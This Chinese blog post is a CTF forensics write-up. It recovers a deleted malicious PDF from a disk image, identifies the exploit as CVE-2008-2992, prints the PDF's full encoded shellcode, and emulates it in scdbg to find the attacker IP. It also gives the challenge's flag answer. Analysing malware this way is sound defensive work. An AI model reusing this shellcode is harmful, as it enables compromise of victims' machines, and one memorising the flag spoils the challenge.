一道国外的标准取证题

最新推荐文章于 2022-05-09 23:05:24 发布
最新推荐文章于 2022-05-09 23:05:24 发布
阅读量1.4k 收藏 1
点赞数
分类专栏: 取证 CTF 文章标签: CTF 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u010418732/article/details/124240803
版权
CTF 同时被 2 个专栏收录
34 篇文章 6 订阅
订阅专栏
取证
3 篇文章 0 订阅
订阅专栏

Policy Violation Pt.1 142 One of our employees violate the company
policy by running a malicious document on the company machine after we
noticed that he deleted the files can you bring it back to make some
analysis?

Q1. What is the CVE Number and Date of exploit? Example:
crew{CVE-XXXX-XXXX_Date:MM.D.YY} Policy Violation Pt.2 648 One of our
employees violated the company policy by running a malicious document
on the company machine after we noticed that he deleted the files can
you bring it back to make some analysis?

Q2. What is the sha1sum of the attacker IP ?

Example: crew{SHA-1(IP)}
crew{ea424d38af72dd1366a08aad1f47eca3e7ec3d24}
下载地址:https://pan.baidu.com/s/1XOosHWU6GiXUX7bp6h0WnQ?pwd=mzy0

题目大概意思是让去寻找以下两个点
1.进行exploit的CVE编号
2.寻找攻击者ip
E01用FTK挂载,很容易可以在回收站目录下发现许多文件
在这里插入图片描述
文件名为:$RD5UESN.pdf的比较可疑,进行导出
习惯性的丢到各个在线分析平台进行分析
virustotal得到结果
在这里插入图片描述得到CVE编号CVE-2008-2992
参考文章 https://www.cnblogs.com/SunsetR/p/11270981.html
使用PDF Stream Dumper提取出shellcode
在这里插入图片描述
以下部分为shellcode

%u91f5%u4297%u412f%u3f98%u4b98%u4342%u9197%u999f%u4092%u4046%u9140%u964e%u9691%u4940%ufd98%u4348%uf537%u4891%u4ad6%ufd3f%ufcf9%u3ff9%u48fc%u4299%u9198%u4392%ud643%u2796%u9b37%uf842%u4afd%ud69f%u274f%u4790%u9797%uf999%u4ff8%ufc48%u3f9f%u9bf8%u92f9%u9847%u4e40%uf54f%u3796%u9096%u9b47%u4343%uf599%u4b97%u9243%u4f47%u4648%u484a%u4f4a%u4993%u97f5%u4f46%u2f9b%u474e%uf590%u96f9%u37d6%u4b98%u9298%ud693%u9f96%u4948%uf542%u97f9%u9190%u9347%u46f5%u9798%ud690%ufc2f%u4737%ufc4a%u9647%u9f91%u3ff8%uf590%u46d6%u2ffc%u4741%u9093%ufd97%u4192%ufc46%u2f48%ufc9b%u279b%u3f4a%u4092%u474a%u37f5%u4690%u99d6%u9b9f%uf597%ufc42%u923f%u479b%u2791%u4e47%u9847%uf993%uf549%u9242%uf849%ufc99%uf596%u9bfd%u413f%u4e4f%uf549%u4348%u4f4e%u422f%ud6f8%u4847%ud627%u919b%ud64a%uf5d6%u9927%u4942%u9241%ufdf8%u9190%u92f5%u4096%ud63f%uf9f8%u9296%ufc92%u434f%u99f5%u9146%u904a%u9f46%u9692%u9143%u49d6%u983f%ud646%u99f5%u3f99%u4146%u494f%u98f9%u93f8%u4949%u9646%uf5fd%u9299%u484b%u4349%u4996%u4f4b%u92f9%uf83f%u3f93%u4f97%ufd4f%u27fd%ufd46%u979f%u493f%uf898%u989b%u9890%u4840%u9f27%u9947%u9f4e%u3798%u4f96%u3f3f%u9b43%u4a92%uf537%u274f%u4399%uf94f%u4298%u9846%u272f%u3f4e%uf83f%u48f5%u4e37%ud693%u484b%u9b92%uf592%u4246%u4b49%u4f49%u9746%u484b%u4f97%u9891%u9991%u3740%u47d6%ufc4e%u489f%u4827%ud642%uf541%ufd91%u4642%u4b93%u42f5%u4e42%u434f%u4bfd%u484f%u4a4b%u4efc%u473f%u99d6%u379f%ud62f%u9b93%u2742%u9f46%u2f9f%u47fc%u4290%u9347%u993f%uf542%u279b%u9b9b%u4647%u9899%uf542%u3f91%u274b%uf997%u92fc%u4837%u4e48%u962f%ufc92%u4e4e%u4f96%u4098%uf84b%ufdfc%u273f%ud642%u9837%u4efc%ud696%u3ff5%u92f8%u4a3f%u46d6%u4198%u2f46%u97f5%u98f5%u9296%u27f9%uf590%u49f5%u483f%u91f5%u9f47%ufdf8%u4637%u9fd6%u374e%u4292%u989b%u483f%u4e96%u9693%u9190%u4049%u92f5%u9b42%u4692%u9b97%u434b%u9142%u9f93%uf94b%u9090%u4ed6%u3793%uf8f5%u41f5%u27fd%u4248%uf5f8%u9293%u4f9b%u4842%u9b92%u464a%u4047%uf843%u46f8%u9796%u42fd%u27f9%u4b4e%u4a92%u3743%u9043%u4a37%u9146%u9b96%u4398%u9896%u9043%u4799%ud947%ubfd0%u9478%u642d%u74d9%uf424%u315e%ub1c9%u3159%u197e%u7e03%u8319%ufcee%u619a%u8cd1%u8ad5%u4d2a%ubb89%u29f8%ueec2%u3acc%u0286%ud8a4%u49ad%ua9a2%u45c3%u52fb%u212c%u8ab1%u8d03%uefea%u7102%u23f1%u48e4%u363a%u8de5%u3c8c%u430a%u3458%u7486%u08ed%u741a%u0721%u0e22%ud844%ua2d6%u0947%u639d%uf968%udb2a%uf870%u59ff%u8e49%u28c3%u5bc1%uaab0%u9203%u9d39%u146b%ud30a%u96c7%ud453%uecf7%u26af%uf685%u5474%u7251%ufe6a%u2412%ufe4e%ub3f7%u0c05%ub0b3%u1141%u1442%u2dfa%u9bcf%ua42c%ubf8b%uece8%ua148%u48a9%ude3e%u35a9%u7a9f%ud4a2%ufbf6%u274b%ua1f7%uebdb%u5a3a%u641b%u294c%u2b29%ua5e6%ua401%u3120%ua210%uedd2%ua39a%u0e2c%ueada%u5aea%u848a%ue2db%u5541%u36e3%u5fff%u7973%u5e57%u119d%u61a5%u86b0%u8720%u18e2%u1862%uc943%uc8c2%u032b%u37cd%u2c4b%u5004%uc3e6%u08f0%u7a9f%uc259%u823e%uae74%u0801%u4e7c%uf9cf%u5cf5%u9e38%u9cf5%u0bb9%uf6f5%u9dbd%u6ea2%uf8bc%u3084%u2f3f%u3797%uaebf%u4ca1%u24f6%u3a8d%ua8f7%ubb0d%ua2a1%ud30d%u9715%uc65e%u0259%u5bf3%uadcc%u08a5%uc647%u764b%u49af%u5db4%u8eb3%u234a%u369c%udb22%uc69c%ub1b2%u971c%u4eda%u1832%uae2a%u7199%u2522%u334c%u3ad3%u9545%u3a4d%u0e6a%u417e%ub103%ub67f%ud60d%ub680%ue831%u60bd%u9e08%ub080%u912f%u95b7%u3806%u8ab7%u6959

在这里插入图片描述
保存之后使用scdbg进行测试执行
在这里插入图片描述

在这里插入图片描述
IP为 192.168.1.30

Tokeii
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
windows下shellcode检测工具
why99fun的专栏
04-16 918
scdbg http://sandsprite.com/blogs/index.php?uid=7&pid=152 setp1: 下载后直接运行gui_launcher.exe,这款工具也提供命令行解决方案,选上你所要使用的选项(setp2图),单击launch就可以分析了,本程序还提供自动寻找(setp3图)shellcode入口点操作,你可以尝试选择0到9的偏移地址,让shellcode
恶意代码分析利器-scdbg.pdf
05-09
恶意代码分析利器-scdbg.pdf
恶意代码分析利器SCDBG.zip
07-17
scdbg是一款多平台开源的Shellcode模拟运行、分析工具。其基于libemulibrary搭建的虚拟环境,通过模拟32位处理器、内存和基本Windows API运行环境来虚拟执行Shellcode以分析其行为。有了虚拟执行妈妈再也不用担心我的电脑中病毒了。 基本原理 众所周知,shellcode为了实现特定的功能必须通过调用系统API来完成-不论先前怎怎么变形怎么加密最后都会调用系统API。scdbg就是通过 模拟执行以及hook多达200多个API来探测shellcode的行为。当然比如创建文件和访问网络这些危险的API并没有真正的在本机执行,而是通 过传回虚假的返回值来欺骗shellcode让其平稳运行。 直接命令行输入scdbg.exe example.sc 来看看输出: 其中example.sc文件就是以二进制形式保存的Shellcode,我们可以看到这段shellcode调用了两次较关键的函数 -CreateProcessA,第一次调用tftp.exe程序下载winapi32.exe,第二次准备执行之。很典型的下载并执行行为。有了 scdbg我们就不必花很多时间在搭建测试环境、解码shellcode、调试理解各种分枝跳转、担心机器是否中招。。。。。。简单明了。 scdbg和通常的命令行工具一样,有着众多参数选项,这里只做最基本的演示,就不一一列举。想必大家都有在命令行下痛苦的经历,命令行的历史就是我等小菜的血泪史,还好scdbg有GUI图形界面版: 指定偏移,自定参数一目了然。 标签:SCDBG
建立单链表的完整代码_【手绘漫画】面试必考之图解逆转单链表/单链表逆序...
weixin_39918690的博客
12-10 117
1、 写在前面这是一个很经典的目,【单链表逆序】问。很多公司的面试库中都有这道,有的公司明确目要求不能使用额外的节点存储空间,有的没有明确说明,但是如果面试者使用了额外的节点存储空间做中转,会得到一个比较低的分数。 那么如何在不使用额外存储节点的情况下,使一个单链表的所有节点逆序?一千个人有一千个哈姆雷特,然后我都没看懂,,,最后是在手动推了一遍代码之后,才大概了解了这个过程,这里来手...
计算机取证.doc
06-13
2. 取证工具的选择:工具的选择应当遵循NIST(美国国家标准与技术研究院)和NIJ(美国国家司法研究所)制定的标准。工具在使用前和更新后都需进行验证,以确认其性能和合规性。 3. Linux文件系统的数据位图(Data ...
国外取证工具最新版
08-26
国外最好的反取证工具,可能用来清理系统痕迹,有需要的自行下载。
电子数据取证标准 2014.docx
04-23
电子数据取证标准是信息安全领域的一个全新分支,逐渐受到人们的重视。随着全球信息化的飞速发展,电子证据在各种网络应用中大量涉及。但是,随着互联网违法犯罪的增长,电子数据取证技术的重要性也开始受到重视。...
电工取证考试.pdf
10-14
电工取证考试涵盖了电工安全基础知识、电力系统运行、电气设备维护、安全规程等多个方面。以下是根据目内容整理出的相关知识点: 1. **绝缘与接地**:工作零线和相线应有相同的绝缘水平,且应分别敷设。接地...
CTF取证目指南
01-09
任何要求检查一个静态数据文件(与可执行程序和远程服务器不同)从而获取隐藏信息的都可以被认为是取证(除非它包含了密码学知识而被认为是密码类赛)。 取证作为CTF中的一大类目,不完全包括安全产业中的实际...
cve漏洞分析:cve-2010-0805(附带测试代码) cve-2010-0853
云里雾里的专栏
05-23 3779
【警告:以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负】对象1:【附带攻击测试代码和效果演示】1.      CVE编号:cve-2010-0805 2.      微软漏洞编号:ms10-0183.      漏洞名称:Microsoft IE Tabular Data Control ActiveX控件远程代码执行漏洞4.      危害性:
【安全】漏洞名词扫盲(POC,EXP,CVE,CVSS等)
热门推荐
qqchaozai的专栏
12-16 2万+
POC(Proof of Concept) 漏洞证明,漏洞报告中,通过一段描述或一个样例来证明漏洞确实存在 EXP(Exploit) 漏洞利用,某个漏洞存在EXP,意思就是该漏洞存在公开的利用方式(比如一个脚本) 0DAY 含义是刚刚被发现,还没有被公开的漏洞,也没有相应的补丁程序,威胁极大。 CVE(Common Vulnerabilities & Exposures) 公共漏洞和...
CVE-2021–26855与CVE-2021–27065漏洞分析及复现
hongduilanjun的博客
05-09 3965
文章首发先知社区:https://xz.aliyun.com/t/10098 前言 微软在上半年三月披露了关于Exchange邮件服务器CVE-2021–26855(SSRF)与CVE-2021–27065(任意文件写入)的漏洞,这两个漏洞配合可以造成未授权的webshell写入,是非常严重的高危漏洞。漏洞刚出来那会儿并未注意,正好前两天4哥在群里发了个关于该漏洞的复现环境,重新想起这个事,正好暑假也没干啥正事,借此机会复现分析一下。 CVE-2021–26855 CVE-2021–26855是⼀个SSRF
s2-052漏洞复现利用 CVE-2017-9805
w7deer的博客
04-20 766
S2-052(CVE-2017-9805)环境: VulApps/s/struts2/s2-052 at master · Medicean/VulApps · GitHub 访问 http://你的 IP 地址:端口号/ 漏洞poc检测与利用 poc下载: https://github.com/Lone-Ranger/apache-struts-pwn_CVE-2017-9805 检测到漏洞存在: python apache-struts-pwn.py -u 'http://192.1.
Tryhackme-hackerNote
个人博客
09-14 210
hackerNote 文章目录hackerNoteTask1 ReconnaissanceTask2 InvestigateTask3 ExploitTask4 Attack PasswordsTask5 EscalateTask6 Comments on realism and Further Reading Task1 Reconnaissance 1.Which ports are open? (in numerical order) 22,80,8080 2.What programming la
Dirty-Pipe Linux内核提权漏洞复现(CVE-2022-0847)
beichenyyds的博客
04-07 5171
漏洞描述 CVE-2022-0847-DirtyPipe-Exploit 存在于 Linux内核 5.8 及之后版本中的本地提权漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件(甚至是只读文件)中的数据,从而可将普通权限的用户提升到root权限。 CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏洞(Dirty Cow),但它更容易被利用,漏洞作者将此漏洞命名为Dirty Pipe。 影响版本 影响范围:5.8 <= Linux 内核版本 < 5.
【CVE】CVE-2020-17518 & CVE-2020-17519:Flink 任意文件上传 & 未授权访问
边扯边淡
05-09 2541
起序:漏扫完看报告的时候发现的,复现学习一下。 一、靶场环境 使用的是 github 上的 vulhub 环境。因为 Flink 中的 CVE-2020-17518 和 CVE-2020-17519 在 Flink/1.11.2 版本都存在。 vulhub:https://github.com/vulhub/vulhub 1、漏洞描述:任意文件上传 & 未授权访问 CVE 编号 名称 危害 CVE-2020-17518 任意文件上传 应用系统在文件上传功能处对用户上传.
CVE-2016-5159 脏牛内核提权
weixin_51339377的博客
04-09 856
Linux内核提权 脏牛提权漏洞 Linux内核的子系统在处理写入时复制至产生了竞争条件 恶意用户可以利用此漏洞来获得高权限 对只读内存映射进行访问 并且在提权的时候 杀毒软件并不会检测到 影响范围: Linux内核>=2.6.22 (2007年发行)开始就受到了影响,直到2016年10月18日才修复 查看内核的版本 uname -a 查看用户的权限 id 进行提权即可 ls ./dirty 漏洞原理: 该漏洞具体为,get_us...
[POC分享]CVE-2021-04-06 vsftpd 3.0.3 - Remote Denial of Service
「鸿渐之翼」的博客
04-23 2349
免责声明: 本POC程序仅供安全研究与教学之用,使用者将其信息做其他用途,由使用者承担全部法律及连带责任,CSDN博客平台及博主鸿渐之翼不承担任何法律及连带责任。 # Exploit Title: vsftpd 3.0.3 - Remote Denial of Service # Date: 22-03-2021 # Exploit Author: xynmaps # Vendor Homepage: https://security.appspot.com/vsftpd.html # Software L
国外电子取证技术研究现状:
最新发布
06-13
4. 取证标准和规范:国外电子取证技术发展较早,已经形成了一系列的取证标准和规范,如NIST、ISO、ANSI等,这些标准和规范对电子取证的流程、方法、技术等方面进行了明确的规定和指导。 总的来说,国外电子取证技术...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值